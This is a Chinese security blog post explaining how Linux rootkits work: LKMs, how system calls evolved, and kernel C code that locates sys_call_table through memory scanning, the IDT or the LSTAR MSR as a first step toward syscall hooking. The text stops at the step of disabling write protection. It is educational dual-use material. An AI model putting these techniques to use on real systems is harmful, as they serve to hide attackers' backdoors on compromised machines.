<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="//fonts.loli.net/css?family=Noto+Serif+SC:300,300italic,400,400italic,700,700italic|Lobster+Two:300,300italic,400,400italic,700,700italic|EB+Garamond:300,300italic,400,400italic,700,700italic|Roboto+Slab:300,300italic,400,400italic,700,700italic|Source+Code+Pro:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.14.0/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css">

<script class="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"driverxdw.github.io","root":"/","scheme":"Muse","version":"8.0.0-rc.5","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12},"copycode":true,"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}};
  </script>

  <meta name="description" content="原理rootkit介绍0x01    功能rootkit可以简单理解root.kit，即攻击者取得root权限后所用的工具包，一般来说，90%的rootkit主要目标都是来做对攻击者后门行为的隐藏，但仍有部分rootkit是存在系统操纵和数据收集行为的，包括键盘记录、流量嗅探及程序运行重定向等等；通常来说，rootkit的功能越单一，就越难检测到，一旦rootkit行为太多，很可能触及一些chec">
<meta property="og:type" content="article">
<meta property="og:title" content="Rootkit principle analysis and behavior detection">
<meta property="og:url" content="https://driverxdw.github.io/2020/09/09/Rootkit-principle-analysis-and-behavior-detection/index.html">
<meta property="og:site_name" content="in0va&#39;S Blog  JustLearnM0re">
<meta property="og:description" content="原理rootkit介绍0x01    功能rootkit可以简单理解root.kit，即攻击者取得root权限后所用的工具包，一般来说，90%的rootkit主要目标都是来做对攻击者后门行为的隐藏，但仍有部分rootkit是存在系统操纵和数据收集行为的，包括键盘记录、流量嗅探及程序运行重定向等等；通常来说，rootkit的功能越单一，就越难检测到，一旦rootkit行为太多，很可能触及一些chec">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://driverxdw.github.io/2020/09/09/Rootkit-principle-analysis-and-behavior-detection/2020-05-21-15900666966842-syscall-steps.png">
<meta property="og:image" content="https://driverxdw.github.io/2020/09/09/Rootkit-principle-analysis-and-behavior-detection/image-20200910001052139.png">
<meta property="og:image" content="https://driverxdw.github.io/2020/09/09/Rootkit-principle-analysis-and-behavior-detection/image-20200911004704932.png">
<meta property="og:image" content="https://driverxdw.github.io/2020/09/09/Rootkit-principle-analysis-and-behavior-detection/image-20200911004836610.png">
<meta property="og:image" content="https://driverxdw.github.io/2020/09/09/Rootkit-principle-analysis-and-behavior-detection/image-20200911021546937.png">
<meta property="og:image" content="https://driverxdw.github.io/2020/09/09/Rootkit-principle-analysis-and-behavior-detection/image-20200911033112456.png">
<meta property="article:published_time" content="2020-09-09T12:21:04.000Z">
<meta property="article:modified_time" content="2020-09-11T19:40:08.452Z">
<meta property="article:author" content="XDW">
<meta property="article:tag" content="二进制">
<meta property="article:tag" content="攻防">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://driverxdw.github.io/2020/09/09/Rootkit-principle-analysis-and-behavior-detection/2020-05-21-15900666966842-syscall-steps.png">


<link rel="canonical" href="https://driverxdw.github.io/2020/09/09/Rootkit-principle-analysis-and-behavior-detection/">


<script class="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>Rootkit principle analysis and behavior detection | in0va'S Blog  JustLearnM0re</title>
  






  <noscript>
  <style>
  body { margin-top: 2rem; }

  .use-motion .menu-item,
  .use-motion .sidebar,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header {
    visibility: visible;
  }

  .use-motion .header,
  .use-motion .site-brand-container .toggle,
  .use-motion .footer { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle,
  .use-motion .custom-logo-image {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line {
    transform: scaleX(1);
  }

  .search-pop-overlay, .sidebar-nav { display: none; }
  .sidebar-panel { display: block; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">in0va'S Blog  JustLearnM0re</h1>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">犯二</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">11</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">83</span></a>

  </li>
  </ul>
</nav>




</div>
        
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <section class="post-toc-wrap sidebar-panel">
          <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#原理"><span class="nav-number">1.</span> <span class="nav-text">原理</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#rootkit介绍"><span class="nav-number">1.1.</span> <span class="nav-text">rootkit介绍</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#0x01-功能"><span class="nav-number">1.1.1.</span> <span class="nav-text">0x01    功能</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#0x02-分类"><span class="nav-number">1.1.2.</span> <span class="nav-text">0x02    分类</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#0x03-lkm"><span class="nav-number">1.1.3.</span> <span class="nav-text">0x03    lkm</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#0x04-hook"><span class="nav-number">1.1.4.</span> <span class="nav-text">0x04    hook</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#syscall-amp-amp-libc-hook"><span class="nav-number">1.2.</span> <span class="nav-text">syscall &amp;&amp; libc hook</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#0x01-系统调用方式和演变过程"><span class="nav-number">1.2.1.</span> <span class="nav-text">0x01    系统调用方式和演变过程</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#0x02-系统调用hook"><span class="nav-number">1.2.2.</span> <span class="nav-text">0x02    系统调用hook</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#0x03-libc-hook"><span class="nav-number">1.2.3.</span> <span class="nav-text">0x03    libc hook</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#通用的rootkit攻击手法"><span class="nav-number">1.3.</span> <span class="nav-text">通用的rootkit攻击手法</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#检测"><span class="nav-number">2.</span> <span class="nav-text">检测</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#通用检测方式"><span class="nav-number">2.1.</span> <span class="nav-text">通用检测方式</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#开源项目"><span class="nav-number">2.2.</span> <span class="nav-text">开源项目</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#总结-amp-思考"><span class="nav-number">3.</span> <span class="nav-text">总结&amp;思考</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#参考"><span class="nav-number">4.</span> <span class="nav-text">参考</span></a></li></ol></div>
      </section>
      <!--/noindex-->

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="XDW"
      src="/images/author.jpg">
  <p class="site-author-name" itemprop="name">XDW</p>
  <div class="site-description" itemprop="description">一枚很菜但是仍在学习的二进制菜逼</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">83</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">11</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
        <span class="site-state-item-count">50</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>


  <div class="links-of-blogroll animated">
    <div class="links-of-blogroll-title"><i class="fa fa-globe fa-fw"></i>
      友链
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://blog.ixuchao.cn/" title="https:&#x2F;&#x2F;blog.ixuchao.cn&#x2F;" rel="noopener" target="_blank">Archerx's Blog</a>
        </li>
    </ul>
  </div>

      </section>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">
      

      

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://driverxdw.github.io/2020/09/09/Rootkit-principle-analysis-and-behavior-detection/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/author.jpg">
      <meta itemprop="name" content="XDW">
      <meta itemprop="description" content="一枚很菜但是仍在学习的二进制菜逼">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="in0va'S Blog  JustLearnM0re">
    </span>

    
    
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Rootkit principle analysis and behavior detection
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2020-09-09 20:21:04" itemprop="dateCreated datePublished" datetime="2020-09-09T20:21:04+08:00">2020-09-09</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">更新于</span>
        <time title="修改时间：2020-09-12 03:40:08" itemprop="dateModified" datetime="2020-09-12T03:40:08+08:00">2020-09-12</time>
      </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/HIDS/" itemprop="url" rel="index"><span itemprop="name">HIDS</span></a>
        </span>
    </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h2 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h2><h3 id="rootkit介绍"><a href="#rootkit介绍" class="headerlink" title="rootkit介绍"></a>rootkit介绍</h3><h4 id="0x01-功能"><a href="#0x01-功能" class="headerlink" title="0x01    功能"></a>0x01    功能</h4><p>rootkit可以简单理解root.kit，即攻击者取得root权限后所用的工具包，一般来说，90%的rootkit主要目标都是来做对攻击者后门行为的隐藏，但仍有部分rootkit是存在系统操纵和数据收集行为的，包括键盘记录、流量嗅探及程序运行重定向等等；通常来说，rootkit的功能越单一，就越难检测到，一旦rootkit行为太多，很可能触及一些checklist导致暴露，所以保持rootkit功能的单一性是一个优秀的渗透人员需要有的理解。</p>
<h4 id="0x02-分类"><a href="#0x02-分类" class="headerlink" title="0x02    分类"></a>0x02    分类</h4><p>通常来说目前常见的rootkit基本可以根据应用的层级分为两类，一种是工作在ring0层的rootkit，另一种是工作在ring3层的rootkit，还有一种比较高级，应用在主机bios层，由于当前场景较少，暂不深入。</p>
<h4 id="0x03-lkm"><a href="#0x03-lkm" class="headerlink" title="0x03    lkm"></a>0x03    lkm</h4><p>LKM是loadable kernel module的缩写，意为可加载内核模块，内核本身是一个单模块，单内核模块运行效率高，但是由于所有内容都集成在一个模块里，所以可扩展性/可维护性是比较弱的，为了弥补这个问题，内核模块机制就出现了，原生linux的功能也因lkm的出现可以得到扩展。lkm的优点主要集中在两个方面：</p>
<p>1、动态加/卸载</p>
<p>2、轻量</p>
<p>前者在给内核添加新功能时不用频繁的重编译源码，后者则让lkm本身的体积无论编写还是编译都不会太过重量。</p>
<a id="more"></a>

<p>一个最基础的lkm如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;linux/kernel.h&gt;																			#包含内核使用的一些函数、变量、宏等等</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;linux/module.h&gt;																			#包含模块结构的定义及模块版本控制等等</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;linux/init.h&gt;																				#包含了module_init和module_exit函数的声明</span></span></span><br><span class="line">MODULE_LICENSE(<span class="string">"GPL"</span>);																				#许可证</span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">int</span> <span class="title">hello_init</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  printk(KERN_WARNING <span class="string">"HELLOWORLD"</span>);</span><br><span class="line">  <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">static</span> <span class="keyword">void</span> <span class="title">hello_exit</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  printk(<span class="string">"BYE"</span>);</span><br><span class="line">&#125;</span><br><span class="line">module_init(hello_init);																			#模块加载函数</span><br><span class="line">module_exit(hello_exit);																			#模块卸载函数</span><br></pre></td></tr></table></figure>

<p>Makefile文件如下：</p>
<figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">obj-m := hello_module.o</span><br><span class="line">KERNELBUILD := /lib/modules/<span class="variable">$(<span class="built_in">shell</span> uname -r)</span>/build</span><br><span class="line">CURRENT_PATH := <span class="variable">$(<span class="built_in">shell</span> pwd)</span></span><br><span class="line"><span class="section">all:</span></span><br><span class="line">    make -C <span class="variable">$(KERNELBUILD)</span> M=<span class="variable">$(CURRENT_PATH)</span> modules</span><br><span class="line"><span class="section">clean:</span></span><br><span class="line">    make -C <span class="variable">$(KERNELBUILD)</span> M=<span class="variable">$(CURRENT_PATH)</span> clean</span><br></pre></td></tr></table></figure>

<h4 id="0x04-hook"><a href="#0x04-hook" class="headerlink" title="0x04    hook"></a>0x04    hook</h4><p>rootkit无论如何也绕不去的一个坎。rootkit本质上其实就是通过hook进行工作的，根据rootkit工作的层级，其hook的对象也有差异，一般来说，内核态rootkit hook系统调用，用户态rootkit hook libc；从用户态出发，程序不可避免会去执行libc库中的函数，libc去调系统调用切进内核调内核函数，一旦hook了syscall/libc，就相当于劫持了程序在用户态/内核态的控制流，rootkit最核心的一点就在于这里。</p>
<h3 id="syscall-amp-amp-libc-hook"><a href="#syscall-amp-amp-libc-hook" class="headerlink" title="syscall &amp;&amp; libc hook"></a>syscall &amp;&amp; libc hook</h3><h4 id="0x01-系统调用方式和演变过程"><a href="#0x01-系统调用方式和演变过程" class="headerlink" title="0x01    系统调用方式和演变过程"></a>0x01    系统调用方式和演变过程</h4><p>由于内核rootkit需要对系统调用进行hook，linux系统调用流程有必要去了解，后续可以了解到不同版本系统、cpu架构下的hook方式其实是有较大差别的。linux系统调用方式的演进如下所示：</p>
<figure class="highlight xl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="title">int</span> 0x80	-&gt;</span>	<span class="function"><span class="title">sysenter</span>/syscall	-&gt;</span>	vsdo</span><br></pre></td></tr></table></figure>

<p><strong>int 0x80</strong></p>
<p>早期的x86处理器使用int 0x80进行软中断触发系统调用从用户态切换到内核态执行内核函数，一般来说经典软中断要经历如下几个流程：</p>
<p>1、应用程序调c库</p>
<p>2、c库函数内部调系统调用，将参数放到栈上，将系统调用号放到寄存器（eax），布置完后调int 0x80</p>
<p>3、cpu接收到中断，去IDT中寻找0x80对应中断描述符</p>
<p>4、找到中断描述符后切换到内核栈（tss.ss0:tss.esp0），再根据中断描述符信息找到中断服务例程的基址和偏移分别加载到cs和eip，</p>
<p>5、用户态上下文信息压入内核栈</p>
<p>6、执行0x80对应的中断服务例程（system_call），根据eax中的系统调用号去system_call_table系统调用表中寻找具体的系统调用例程并执行</p>
<p>7、执行完后syscall_exit，从内核栈恢复用户态上下文，切回用户空间</p>
<p><img src="./2020-05-21-15900666966842-syscall-steps.png" alt="syscall-steps"></p>
<p><strong>sysenter/syscall</strong></p>
<p>从以上流程可以看出，软中断整个过程其实是非常繁琐的，特别是栈切换和系统调用内部对参数的安全/合法性检查，这在频繁调用系统调用在内核和用户态间来回切换的应用程序执行环境中会造成大量的性能损失。针对早期软中断的性能问题，linux团队在新版本中操作系统中引入了快速系统调用指令sysenter/syscall，分别用于32/64位，至于为什么未使用同一系统调用指令，是因为sysenter和syscall分别由intel和amd设计出，二者早期因商业竞争关系兼容这块做的并不好，只能由linux这块去做调用方的兼容，为了保证最大兼容，就针对intel/amd的架构设计了两条不同的快速调用汇编指令。</p>
<p><strong>sysenter</strong></p>
<p>32位下的syenter系统调用流程如下：</p>
<p>1、引入三个MSR寄存器，内核初始化时会将系统调用的回调函数放在IA32_SYSENTER_EIP MSR寄存器中</p>
<p>2、根据调用惯例从eax及其它寄存器中取系统调用号和传参</p>
<p>3、之后的流程大致同软中断</p>
<p><strong>syscall</strong></p>
<p>64位下的syscall系统调用流程与sysenter类似，其系统调用流程如下：</p>
<p>1、引入四个MSR寄存器，内核初始化时会将系统调用的回调函数放在IA32_LSTAR MSR寄存器中</p>
<p>2、根据调用惯例从eax及其它寄存器中取系统调用号和传参</p>
<p>3、之后的流程大致同软中断</p>
<p>快速汇编指令相比软中断少了IDT中断服务例程的寻址及内核栈切换的过程，相比软中断减少了部分系统调用耗费的时间。</p>
<p><strong>vdso</strong></p>
<p>vdso全称为虚拟动态共享对象，其原理是把原属于linux内核空间的函数映射到用户态，让用户态的应用程序不再需要进行系统调用切换进内核，从而减少应用程序执行过程中在系统调用上的性能损耗。vsdo使用标准的链接与加载技术，由内核提供并动态映射到用户态每一个正在执行的进程空间中。因为是由内核提供，所以在用户态无法直接找到vdso对应的so库文件。</p>
<p><img src="./image-20200910001052139.png" alt="image-20200910001052139"></p>
<p>vsdo的内核函数映射模式相对前两者性能损耗大幅降低，甚至可以与用户态函数调用持平，但因为将内核函数映射到用户态整个过程可能存在稳定性及安全等风险，所以vsdo这块目前只支持少量函数映射。</p>
<h4 id="0x02-系统调用hook"><a href="#0x02-系统调用hook" class="headerlink" title="0x02    系统调用hook"></a>0x02    系统调用hook</h4><p>系统调用hook的钩法很多，这边介绍最常用，也是最简单有效的一种，即系统调用表hook，而其它一些钩法如kernel inline hook、kprobe hook等暂时还未深入，等待之后填坑。</p>
<p>系统调用表hook的整体流程如下：</p>
<p>1、system_call_table地址获取</p>
<p>2、内存保护关闭</p>
<p>3、系统调用表函数指针替换</p>
<p><strong>system_call_table</strong></p>
<p>首先是系统调用表地址的获取，常用方式如下：</p>
<p>1、暴力搜索</p>
<p>2、/proc/kallsyms | /boot/System.map</p>
<p>3、IDT</p>
<p><strong>暴力搜索</strong></p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">unsigned</span> <span class="keyword">long</span> **</span><br><span class="line">get_sct_via_sys_close(<span class="keyword">void</span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">long</span> **entry = (<span class="keyword">unsigned</span> <span class="keyword">long</span> **)PAGE_OFFSET;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> (;(<span class="keyword">unsigned</span> <span class="keyword">long</span>)entry &lt; ULONG_MAX; entry += <span class="number">1</span>) &#123;</span><br><span class="line">        <span class="keyword">if</span> (entry[__NR_close] == (<span class="keyword">unsigned</span> <span class="keyword">long</span> *)sys_close) &#123;</span><br><span class="line">            <span class="keyword">return</span> entry;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="literal">NULL</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>PAGE_OFFSET是宏定义，代表内核页起始地址，sys_close表示具体的系统调用函数指针，__NR_close可理解为系统调用号，此函数表示从内核页起始地址开始遍历，一旦检测到存在内核地址+系统调用号偏移对应的指针指向的地址空间为sys_close系统调用函数指针，则认为该地址为系统调用表地址。</p>
<p><strong>/proc/kallsyms｜/boot/System.map</strong></p>
<p><img src="./image-20200911004704932.png" alt="image-20200911004704932"></p>
<p><img src="./image-20200911004836610.png" alt="image-20200911004836610"></p>
<p>/boot/System.map在系统初始化时存储了内核的全量符号表，包括内核函数和变量符号地址对应关系；/proc/kallsyms除了内核符号外还额外存储了其它需动态加载模块的符号信息，导致其要比前者大一点。两张表中都存有系统调用表的硬编码地址。</p>
<p><strong>IDT</strong></p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">unsigned</span> <span class="keyword">long</span>  *<span class="title">find_sys_call_table</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">unsigned</span> <span class="keyword">int</span> sys_call_off;</span><br><span class="line">	<span class="keyword">char</span> *p;</span><br><span class="line">	<span class="keyword">int</span> i;</span><br><span class="line">	<span class="keyword">unsigned</span> <span class="keyword">int</span> ret;</span><br><span class="line">	<span class="keyword">asm</span>(<span class="string">"sidt %0"</span>:<span class="string">"=m"</span>(idtr));</span><br><span class="line">	printk(<span class="string">"br: idt table-0x%x\n"</span>, idtr.addr);</span><br><span class="line">	<span class="built_in">memcpy</span>(&amp;idt, idtr.addr+<span class="number">8</span>*<span class="number">0x80</span>, <span class="keyword">sizeof</span>(idt));</span><br><span class="line">	sys_call_off = ((idt.offset_2 &lt;&lt; <span class="number">16</span>) | idt.offset_1);</span><br><span class="line">	p = sys_call_off;</span><br><span class="line">	<span class="keyword">for</span>(i = <span class="number">0</span>; i &lt; <span class="number">100</span>; i++)&#123;</span><br><span class="line">		<span class="keyword">if</span>(p[i] == <span class="string">'\xff'</span> &amp;&amp; p[i+<span class="number">1</span>] == <span class="string">'\x14'</span> &amp;&amp; p[i+<span class="number">2</span>] == <span class="string">'\x85'</span>)</span><br><span class="line">			ret = *(<span class="keyword">unsigned</span> <span class="keyword">int</span> *)(p + i + <span class="number">3</span>);</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	printk(<span class="string">"br: sys_call_table-0x%x\n"</span>, ret);</span><br><span class="line">	<span class="keyword">return</span> (<span class="keyword">unsigned</span> <span class="keyword">long</span>**)ret;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>在软中断的系统调用场景中，可以通过先拿到idt中断描述符表地址，然后在0x80对应的中断例程system_call函数空间内搜索call sys_call_table汇编中call对应的call(\xff\x14\x85)硬编码特征的方式拿到sys_call_table具体地址。</p>
<figure class="highlight nimrod"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">void</span> *get_sys_call_table(<span class="built_in">void</span>) &#123;</span><br><span class="line">    <span class="built_in">void</span> *system_call;</span><br><span class="line">    unsigned <span class="built_in">char</span> *<span class="keyword">ptr</span>;</span><br><span class="line">    <span class="built_in">int</span> i, low, high;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">asm</span>(<span class="string">"rdmsr"</span> : <span class="string">"=a"</span> (low), <span class="string">"=d"</span> (high) : <span class="string">"c"</span> (<span class="type">IA32_LSTAR</span>));</span><br><span class="line">    system_call = (<span class="built_in">void</span>*)(((long)high&lt;&lt;<span class="number">32</span>) | low);</span><br><span class="line">    printk(<span class="type">KERN_INFO</span> <span class="string">"system_call: 0x%p"</span>, system_call);</span><br><span class="line">    <span class="keyword">for</span> (<span class="keyword">ptr</span>=system_call, i=<span class="number">0</span>; i&lt;<span class="number">500</span>; i++) &#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="keyword">ptr</span>[<span class="number">0</span>] == <span class="number">0xff</span> &amp;&amp; <span class="keyword">ptr</span>[<span class="number">1</span>] == <span class="number">0x14</span> &amp;&amp; <span class="keyword">ptr</span>[<span class="number">2</span>] == <span class="number">0xc5</span>)</span><br><span class="line">            <span class="keyword">return</span> (<span class="built_in">void</span>*)(<span class="number">0xffffffff00000000</span> | *((unsigned <span class="built_in">int</span>*)(<span class="keyword">ptr</span>+<span class="number">3</span>)));</span><br><span class="line">        <span class="keyword">ptr</span>++;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="type">NULL</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>Sysenter/syscall的场景与软中断类似，省略了根据idt找system_call的步骤，以及64位下的call机器码为\xff\x14\xc5，其余与软中断基本一致。</p>
<p><strong>内存写保护关闭</strong></p>
